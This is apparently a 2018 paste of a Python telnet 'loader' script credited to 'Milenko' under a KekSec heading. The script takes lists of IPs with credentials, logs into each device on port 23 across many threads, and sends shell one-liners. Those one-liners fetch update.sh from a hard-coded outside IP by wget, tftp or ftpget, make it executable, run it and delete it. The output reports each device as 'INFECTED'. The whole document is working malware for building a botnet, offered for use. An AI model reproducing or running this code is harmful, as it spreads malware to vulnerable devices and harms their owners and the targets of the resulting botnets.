KekSec

Untitled

Aug 5th, 2018
  1. #!/usr/bin/python
  2. #Phaaaat hax telnet loader by Milenko
  3.  
  4. import sys, re, os, socket, time, select
  5. from threading import Thread
  6. from time import sleep
  7.  
  8. if len(sys.argv) < 2:
  9. sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
  10.  
  11. wget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.196/update.sh -O update.sh; busybox wget http://185.10.68.196/update.sh -O update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #wget command to send
  12. tftp = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r update.sh -g 185.10.68.196; busybox tftp -r update.sh -g 185.10.68.196; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #tftp command to send
  13. ftpget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh"
  14.  
  15. print "\033[31m"
  16.  
  17. print "S-S-SUUUPER fast telnet loader by Milenko"
  18. print
  19. #simply find and replace newlines to :: then a newline so every IP starts with ::. It will scan those for port 22 or whatever your skiddie heart desires </3
  20. print "Reads ip:port user:pass and simply checks the IP for port 23."
  21. print "Then sends the infect to it and saves the working telnets to \"working.txt\""
  22. print "It is VERY fast and extremely efficient."
  23. print "As it splits the file into equal chunks for each thread!"
  24.  
  25. threads = int(raw_input("Threads: "))
  26.  
  27. lines = open(sys.argv[1],"r").readlines()
  28.  
  29. global fh
  30. fh = open("workingtelnet.txt","a+")
  31.  
  32. def chunkify(lst,n):
  33. return [ lst[i::n] for i in xrange(n) ]
  34.  
  35. running = 0
  36.  
  37. global loaded
  38. loaded = 0
  39. global rekt
  40. rekt = []
  41.  
  42. def printStatus():
  43. global loaded
  44. while 1:
  45. sleep(30)
  46. print "\033[32m[\033[31m+\033[32m] Total eye pees loaded: " + str(loaded) + "\033[37m"
  47. if loaded >= 1000:
  48. print "Dayum u got sum phat hax brah :^}"
  49.  
  50.  
  51. def readUntil(tn, advances, timeout=8):
  52. buf = ''
  53. start_time = time.time()
  54. while time.time() - start_time < timeout:
  55. buf += tn.recv(1024)
  56. time.sleep(0.1)
  57. for advance in advances:
  58. if advance in buf: return buf
  59. return ""
  60.  
  61. def recvTimeout(sock, size, timeout=8):
  62. sock.setblocking(0)
  63. ready = select.select([sock], [], [], timeout)
  64. if ready[0]:
  65. data = sock.recv(size)
  66. return data
  67. return ""
  68.  
  69. def contains(data, array):
  70. for test in array:
  71. if test in data:
  72. return True
  73. return False
  74.  
  75. def infect(ip,username,password):
  76. global rekdevice
  77. global rekt
  78. global loaded
  79. global fh
  80. try:
  81. tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  82. tn.settimeout(1)
  83. tn.connect((ip, 23))
  84. hoho = ''
  85. hoho += readUntil(tn, ":")
  86. if ":" in hoho:
  87. tn.send(username + "\r\n")
  88. time.sleep(0.2)
  89. else:
  90. return
  91. hoho = ''
  92. hoho += readUntil(tn, ":")
  93. if ":" in hoho:
  94. tn.send(password + "\r\n")
  95. time.sleep(0.2)
  96. prompt = ''
  97. prompt += recvTimeout(tn, 40960)
  98. if "#" in prompt or "$" in prompt or "~" in prompt or ">" in prompt or "root@" in prompt:
  99. try:
  100. tn.send("ls /\r\n")
  101. time.sleep(1)
  102. timeout = 8
  103. buf = ''
  104. start_time = time.time()
  105. while time.time() - start_time < timeout:
  106. buf += recvTimeout(tn, 40960)
  107. time.sleep(0.1)
  108. if "tmp" in buf and "unrecognized" not in buf:
  109. tn.send(wget + "\r\n")
  110. time.sleep(8)
  111. tn.send(tftp + "\r\n")
  112. time.sleep(8)
  113. tn.send(ftpget + "\r\n")
  114. time.sleep(8)
  115. print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
  116. tn.close()
  117. return
  118. except:
  119. tn.close()
  120. else:
  121. #auth failed
  122. tn.close()
  123. except Exception as e:
  124. tn.close()
  125.  
  126. def check(chunk, fh):
  127. global running
  128. global rekt
  129. running += 1
  130. threadID = running
  131. for login in chunk:
  132. try:
  133. if login.split(":")[0] in rekt:
  134. continue
  135. if ":23 " in login:
  136. login = login.replace(":23 ", ":")
  137. if ":2323 " in login:
  138. login = login.replace(":2323 ", ":")
  139. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  140. s.settimeout(0.5)
  141. s.connect((login.split(":")[0], 23))
  142. s.close()
  143. infect(login.split(":")[0], login.split(":")[1], login.split(":")[2])
  144. except:
  145. pass
  146. print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs. Loaded: " + str(loaded)
  147. running -= 1
  148.  
  149. lines = map(lambda s: s.strip(), lines) # remove all newlines
  150.  
  151. chunks = chunkify(lines, threads) # make seperate chunk for each thread
  152.  
  153. print "STARTING SCAN AND LOAD!!!"
  154.  
  155. Thread(target = printStatus, args = ()).start()
  156.  
  157. for thread in xrange(0,threads):
  158. if thread >= 384:
  159. sleep(0.2)
  160. try:
  161. Thread(target = check, args = (chunks[thread], fh,)).start()
  162. except:
  163. pass
  164. print "Scanning... Press enter 3 times to stop."
  165.  
  166. for i in range(0,3):
  167. raw_input()
  168.  
  169. fh.close()
  170.  
  171. os.kill(os.getpid(), 9)